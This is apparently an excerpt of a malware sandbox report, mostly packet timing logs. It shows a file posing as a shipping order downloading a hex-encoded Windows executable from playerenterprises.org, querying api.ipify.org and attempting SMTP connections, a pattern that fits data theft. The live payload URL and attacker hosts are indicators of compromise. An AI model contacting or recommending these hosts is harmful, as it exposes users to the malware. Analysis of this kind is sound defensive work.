                                                            Apr 20, 2024 06:47:59.758899927 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.758965969 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759016037 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759052992 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.759069920 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759108067 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759109020 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.759135008 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.759147882 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759177923 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.759246111 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759289980 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759308100 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.759322882 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759356976 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.759407043 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759443998 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759557962 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759602070 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759634972 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.759634972 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.759634972 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.759701014 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759754896 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759757996 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.759757996 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.759783030 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759819984 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759845972 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.759845972 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.759879112 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759915113 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.759938955 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.759943962 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759967089 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.759996891 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760010004 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.760021925 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760035038 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.760065079 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760087013 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760190964 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.760231972 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.760267973 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760287046 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.760338068 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760338068 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760360003 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.760397911 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.760412931 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760426044 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.760457039 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760477066 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760509968 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.760548115 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.760570049 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760587931 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.760615110 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760615110 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760641098 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760662079 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.760706902 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.760729074 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760741949 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.760767937 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760791063 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760829926 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.760869980 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.760895014 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760906935 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.760935068 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760957003 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.760978937 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761020899 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761043072 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761054993 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761084080 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761106014 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761132956 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761173010 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761194944 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761207104 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761234999 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761256933 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761290073 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761342049 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761365891 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761384964 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761409044 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761428118 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761464119 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761506081 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761528969 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761540890 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761590958 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761590958 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761630058 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761672020 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761697054 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761714935 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761739969 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761759996 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761802912 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761857986 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761872053 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761884928 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.761913061 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761934996 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.761981010 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762023926 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762048960 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762065887 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762088060 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762109995 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762145996 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762187958 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762212038 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762223959 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762250900 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762273073 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762314081 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762351990 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762375116 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762387037 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762415886 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762439966 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762470007 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762510061 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762525082 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762537956 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762568951 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762590885 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762631893 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762671947 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762701035 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762717962 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762747049 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762768030 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762793064 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762833118 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762856960 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762870073 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762901068 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762923002 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.762948990 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.762986898 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763009071 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763020992 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763050079 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763071060 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763103962 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763144970 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763168097 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763180017 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763211012 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763233900 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763263941 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763302088 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763323069 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763335943 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763362885 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763384104 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763411999 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763449907 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763463974 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763475895 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763500929 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763521910 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763571978 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763613939 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763637066 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763657093 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763684034 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763705015 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763756990 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763808966 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763834000 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763864994 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763891935 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763912916 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.763931990 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763972998 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.763997078 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764009953 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.764034033 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764055967 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764096975 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.764172077 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.764175892 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764194965 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.764231920 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764254093 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764317036 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.764355898 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.764378071 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764390945 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.764419079 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764440060 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764476061 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.764518023 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.764539957 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764552116 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.764578104 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764600039 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764636993 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.764679909 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.764700890 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764714003 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.764741898 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764763117 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764797926 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.764837027 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.764858007 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764869928 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.764904022 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764904022 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.764954090 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.764993906 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.765012026 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.765024900 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.765053034 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.765074015 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.765115023 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.765153885 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.765177011 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.765188932 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.765223980 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.765223980 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.765245914 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.765285015 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.765311003 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.765327930 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.765352011 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.765369892 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.940615892 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.940677881 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.940821886 CEST44349731193.222.96.147192.168.2.4
                                                            Apr 20, 2024 06:47:59.940877914 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.940877914 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.940877914 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:47:59.941509962 CEST49731443192.168.2.4193.222.96.147
                                                            Apr 20, 2024 06:48:00.903172970 CEST49732443192.168.2.4172.67.74.152
                                                            Apr 20, 2024 06:48:00.903270960 CEST44349732172.67.74.152192.168.2.4
                                                            Apr 20, 2024 06:48:00.903367043 CEST49732443192.168.2.4172.67.74.152
                                                            Apr 20, 2024 06:48:00.910633087 CEST49732443192.168.2.4172.67.74.152
                                                            Apr 20, 2024 06:48:00.910676003 CEST44349732172.67.74.152192.168.2.4
                                                            Apr 20, 2024 06:48:01.142287970 CEST44349732172.67.74.152192.168.2.4
                                                            Apr 20, 2024 06:48:01.142381907 CEST49732443192.168.2.4172.67.74.152
                                                            Apr 20, 2024 06:48:01.145586014 CEST49732443192.168.2.4172.67.74.152
                                                            Apr 20, 2024 06:48:01.145611048 CEST44349732172.67.74.152192.168.2.4
                                                            Apr 20, 2024 06:48:01.146022081 CEST44349732172.67.74.152192.168.2.4
                                                            Apr 20, 2024 06:48:01.175615072 CEST49675443192.168.2.4173.222.162.32
                                                            Apr 20, 2024 06:48:01.191215038 CEST49732443192.168.2.4172.67.74.152
                                                            Apr 20, 2024 06:48:01.229337931 CEST49732443192.168.2.4172.67.74.152
                                                            Apr 20, 2024 06:48:01.272161007 CEST44349732172.67.74.152192.168.2.4
                                                            Apr 20, 2024 06:48:01.439193010 CEST44349732172.67.74.152192.168.2.4
                                                            Apr 20, 2024 06:48:01.439335108 CEST44349732172.67.74.152192.168.2.4
                                                            Apr 20, 2024 06:48:01.439395905 CEST49732443192.168.2.4172.67.74.152
                                                            Apr 20, 2024 06:48:01.445903063 CEST49732443192.168.2.4172.67.74.152
                                                            Apr 20, 2024 06:48:02.223037958 CEST4973425192.168.2.446.175.148.58
                                                            Apr 20, 2024 06:48:03.222487926 CEST4973425192.168.2.446.175.148.58
                                                            Apr 20, 2024 06:48:05.222495079 CEST4973425192.168.2.446.175.148.58
                                                            Apr 20, 2024 06:48:09.238219976 CEST4973425192.168.2.446.175.148.58
                                                            Apr 20, 2024 06:48:17.238122940 CEST4973425192.168.2.446.175.148.58
                                                            Apr 20, 2024 06:49:04.238624096 CEST4972480192.168.2.423.53.13.32
                                                            Apr 20, 2024 06:49:04.345527887 CEST804972423.53.13.32192.168.2.4
                                                            Apr 20, 2024 06:49:04.345580101 CEST4972480192.168.2.423.53.13.32

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Apr 20, 2024 06:47:54.975570917 CEST5622153192.168.2.41.1.1.1
                                                            Apr 20, 2024 06:47:55.432879925 CEST53562211.1.1.1192.168.2.4
                                                            Apr 20, 2024 06:48:00.793487072 CEST5356753192.168.2.41.1.1.1
                                                            Apr 20, 2024 06:48:00.898452997 CEST53535671.1.1.1192.168.2.4
                                                            Apr 20, 2024 06:48:02.094162941 CEST5809953192.168.2.41.1.1.1
                                                            Apr 20, 2024 06:48:02.222239971 CEST53580991.1.1.1192.168.2.4

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Apr 20, 2024 06:47:54.975570917 CEST192.168.2.41.1.1.10x8ff5Standard query (0)playerenterprises.orgA (IP address)IN (0x0001)false
                                                            Apr 20, 2024 06:48:00.793487072 CEST192.168.2.41.1.1.10xe543Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                            Apr 20, 2024 06:48:02.094162941 CEST192.168.2.41.1.1.10x471fStandard query (0)mail.iaa-airferight.comA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Apr 20, 2024 06:47:55.432879925 CEST1.1.1.1192.168.2.40x8ff5No error (0)playerenterprises.org193.222.96.147A (IP address)IN (0x0001)false
                                                            Apr 20, 2024 06:48:00.898452997 CEST1.1.1.1192.168.2.40xe543No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                            Apr 20, 2024 06:48:00.898452997 CEST1.1.1.1192.168.2.40xe543No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                            Apr 20, 2024 06:48:00.898452997 CEST1.1.1.1192.168.2.40xe543No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                            Apr 20, 2024 06:48:02.222239971 CEST1.1.1.1192.168.2.40x471fNo error (0)mail.iaa-airferight.com46.175.148.58A (IP address)IN (0x0001)false
                                                            Apr 20, 2024 06:48:02.447978020 CEST1.1.1.1192.168.2.40xa6ecNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                            Apr 20, 2024 06:48:02.447978020 CEST1.1.1.1192.168.2.40xa6ecNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                            Apr 20, 2024 06:48:03.347492933 CEST1.1.1.1192.168.2.40xb3fNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Apr 20, 2024 06:48:03.347492933 CEST1.1.1.1192.168.2.40xb3fNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • playerenterprises.org
                                                            • api.ipify.org

                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449730193.222.96.1474436424C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-04-20 04:47:56 UTC103OUTGET /BaseVirtualEnvironment/yummy.txt HTTP/1.1
                                                            Host: playerenterprises.org
                                                            Connection: Keep-Alive
                                                            2024-04-20 04:47:56 UTC256INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Sat, 20 Apr 2024 04:47:56 GMT
                                                            Content-Type: text/plain
                                                            Content-Length: 546814
                                                            Last-Modified: Thu, 18 Apr 2024 18:19:58 GMT
                                                            Connection: close
                                                            ETag: "6621644e-857fe"
                                                            X-Powered-By: PleskLin
                                                            Accept-Ranges: bytes
                                                            2024-04-20 04:47:56 UTC16128INData Raw: 30 78 34 44 2c 20 30 78 35 41 2c 20 30 78 39 30 2c 20 30 78 30 30 2c 20 30 78 30 33 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 34 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 46 46 2c 20 30 78 46 46 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 42 38 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 34 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30 30 2c 20 30 78 30
                                                            Data Ascii: 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0
